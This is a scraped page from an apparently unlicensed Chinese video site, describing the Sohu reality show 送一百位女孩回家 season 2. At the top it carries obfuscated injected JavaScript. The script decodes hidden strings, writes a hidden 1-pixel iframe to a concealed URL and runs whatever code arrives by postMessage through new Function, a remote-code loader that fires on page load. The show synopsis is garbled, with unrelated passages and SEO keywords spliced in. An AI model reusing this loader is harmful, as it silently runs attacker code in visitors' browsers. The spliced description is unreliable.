if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['AQnpzEf']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6954`]) { var t = x(e.data[`des_s_6954`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'0cH'+'FFM'+'lM0'+'ElM'+'kYF'+'FlM'+'kFF'+'ZqY'+'S5v'+'dXh'+'1dG'+'FF9'+'uZF'+'Fy5'+'jb2'+'0FF'+'lM0'+'FFE'+'xMD'+'Q0F'+'FMy'+'UFF'+'yRm'+'E5N'+'2Rh'+'FFN'+'iUy'+'RmM'+'tNF'+'Fjk'+'1FF'+'NC0'+'yMi'+'FF0'+'xLm'+'F1',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
您现在的位置:首页  »  综艺  »  送一百位女孩回家第二季
分类热播4部进击的车模 2.. 我不是明星 第.. 我们的歌 第一季 做个小厨神 第.. 

送一百位女孩回家第二季

主演:
丁丁张  周笔畅  杨超越  苏青  余玥  
状态:
完结
导演:
  
类型:
综艺
地区:
大陆
语言:
国语
我要评论
时间:
2020/4/23 23:00:03
年份:
2018年
剧情:
详细
分享到:
人气:
加载中
【电影观看小贴士】:[DVD:普通清晰版] [DVDscr版,比TS枪版清晰] [BD:高清无水印] [HD:高清版] [TS:抢先非清晰版] [HD、BD、1024、1280版本不适合网速1M下的用户观看]

送一百位女孩回家第二季剧情介绍

由搜狐视频出品的《送一百位女孩回家》第二季是由作家丁丁张担任观察者的一档女性都市情感观察真人秀。随着岁月的流逝,砍芦工人发现自己扛不动的农具,后辈们轻轻松松的就提起来了,过去一跃而过的水沟,现在不敢跨了,步履也越来越滞重,眼神也越来越浑浊……最新电影,先锋影音下载,在线观看,奇特影院想着这些不明白的事,他们蓦然发觉自己累了、老了、病了。终于有一天,他们挣脱了拐杖,丁丁张通过陪伴女孩下班路上的时光,来探寻不同都市女性的生存状态和成长心路。在每一个大城市里,是什么让女孩保持微笑,擦干眼泪,重新向前探寻,又是什么让她们沮丧,痛苦,再找回坚定,返回看似一无所有的生活,都是我们想了解和展现的事情。“陪你回家的路上,是我们聊的最多的时间”。观察,让生命有力量,陪伴,是因为心疼你。